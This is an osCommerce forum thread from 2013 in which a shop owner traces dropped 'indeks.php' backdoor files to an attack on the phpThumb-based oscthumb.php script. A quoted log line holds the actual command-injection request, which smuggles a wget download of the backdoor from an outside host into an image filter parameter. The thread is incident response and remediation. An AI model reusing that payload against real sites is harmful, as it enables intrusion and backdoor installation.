♥altoid Posted April 29, 2013 Share Posted April 29, 2013 this morning site monitor on a 2.2 shop of mine showed two new files...indeks.php and indeks.php1 they were put their sometime since yesterday am and when the site monitor cron ran this am. they were located in the root/public_html folder, same level as index.php the files showed base64 code within and upon converting, it's it had something to do with email hacking or so it appears to me. all else seems fine on that shop. i deleted those files googling their names didn't give me much info. does any one know anything about these files etc. just curious. thanks I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
Guest Posted April 29, 2013 Share Posted April 29, 2013 @@altoid Secure your site ! Your server, change all usernames and passwords. Chris Link to comment Share on other sites More sharing options...
Taipo Posted April 29, 2013 Share Posted April 29, 2013 In many cases, those files appear via a server wide hack (i.e. a backdoor script such as this is dropped in the root of every site on a server). Contact your web service provider and ask them have their servers been compromised recently. Many providers keep a tight lip on these issues and prefer to lay the blame with the user. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
♥altoid Posted April 29, 2013 Author Share Posted April 29, 2013 @@DunWeb Thanks Chris...changed admin user name / pwd but due to a "front page" extension issue the admin folder password protection is a problem.. the host is working on that. first time ever this shop has been compromised...it's an older 2.2 shop and really needs to be brought up to 2.3.3. i just need to tackle that and get a more secure php version to cover it. @@Taipo the host says negative on server wide issues, but they did have a huge nasty server wide issue a couple years back changing all the index files to a hacked file thanks I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
Jack_mcs Posted April 29, 2013 Share Posted April 29, 2013 @@altoid FrontPage extensions are no longer supported by MicroSoft so any security issues will not be fixed. You should ask your host to remove that option. The reason you can't change the password is probably because cPanel, assuming that is what your host uses, won't let you do that if it sees something to do with Frontpage in the .htaccess file. If you delete such entries, it should work. You can then add them back in if needed. For the index files, if it is not too late, you can look in the servers ftp log to get the IP of whoever uploaded those. Your host may have to provide the log if you don't have access to it. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
♥altoid Posted April 29, 2013 Author Share Posted April 29, 2013 @@Jack_mcs Jack, the particular snafu with MS front page extensions, on my host anyway, is that they would not remove via the CP, nor my VPS WHM panels. Tech support had to do the removal and they just finished up, so now I can work with the protected folders in the 2.2 shops. Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of of a button or two. Thanks I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
Jack_mcs Posted April 30, 2013 Share Posted April 30, 2013 @@Jack_mcs Good idea on the log....I will go trolling through those to see what IP might be the culprit. I have this handy add on in this shop that will let me block that IP or an entire range with just the click of of a button or two. LOL. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
♥altoid Posted April 30, 2013 Author Share Posted April 30, 2013 reviewing the log file...the first instance of indeks.php is this: 41.151.224.2 - - [28/Apr/2013:18:38:57 -0400] "GET /oscthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://picasa.com.playteck.net/indeks.php;&phpThumbDebug=9 HTTP/1.1" 200 46324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0" then later in the log there are 6 instances of GET /indeks.php from the same ip which has now been banned from my site so my question is what is the oscthumb involvement here? I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
Jack_mcs Posted April 30, 2013 Share Posted April 30, 2013 Is file.jpg a real image? Maybe the hacker uploaded that file at some point and it has hacker code in it. You may also want to look in the Path Tracker report for that IP and see what he was doing. It might show something. Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
♥altoid Posted April 30, 2013 Author Share Posted April 30, 2013 @@Jack_mcs path tracker for that ip showed this: 2013-04-28 18:37:59 product_info.php products_id=482 pid 482 is a legit product in the shop. searching site...no file.jpg looking here: http://labs.sucuri.net/?details=picasa.com.playteck.net i find: Details for the domain picasa.com.playteck.net URLs and sub domains distributing the malware or acting as a redirector: Blacklist status Blacklist status for picasa.com.playteck.net: http://labs.sucuri.net/?blacklist=picasa.com.playteck.net IP address information Domain picasa.com.playteck.net is at: 67.55.40.35 (67.55.40.35) ip info for that is: IP address : 67.55.40.35 Country : CA State/Province : ONTARIO City : MISSISSAUGA Zip or postal code : L4X 2Z3 i ran a site scan using sucuri.net and it came back clean. same test through comodo came back clean I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
burt Posted April 30, 2013 Share Posted April 30, 2013 Interesting. I wonder if oscthumb is vulnerable ? Link to comment Share on other sites More sharing options...
♥altoid Posted April 30, 2013 Author Share Posted April 30, 2013 @@burt i'm running rob's kiss thumbnailer on my 2.3.3 shops .... which is where this 2.2 shop is headed. :- I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
♥mattjt83 Posted May 28, 2013 Share Posted May 28, 2013 @@altoid @@burt It looks like oscthumb runs phpThumb which is vulnerable. This looks like what Steve posted from the exploit on his site: http://foxtrot7security.blogspot.com/2011/12/new-attempts-to-exploit-old-phpthumb.html I haven't tested this version but they are claiming it is updated to a more secure version of phpThumb: http://addons.oscommerce.com/info/5491 Matt Link to comment Share on other sites More sharing options...
♥altoid Posted May 28, 2013 Author Share Posted May 28, 2013 @@mattjt83 Thanks Matt, I wasn't aware of that add on to address the vulnerability issue. I am going to try that on an existing 2.2 shop, and then for another shop upgrade I opted to go with Robert's KISS Thumb add on. I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.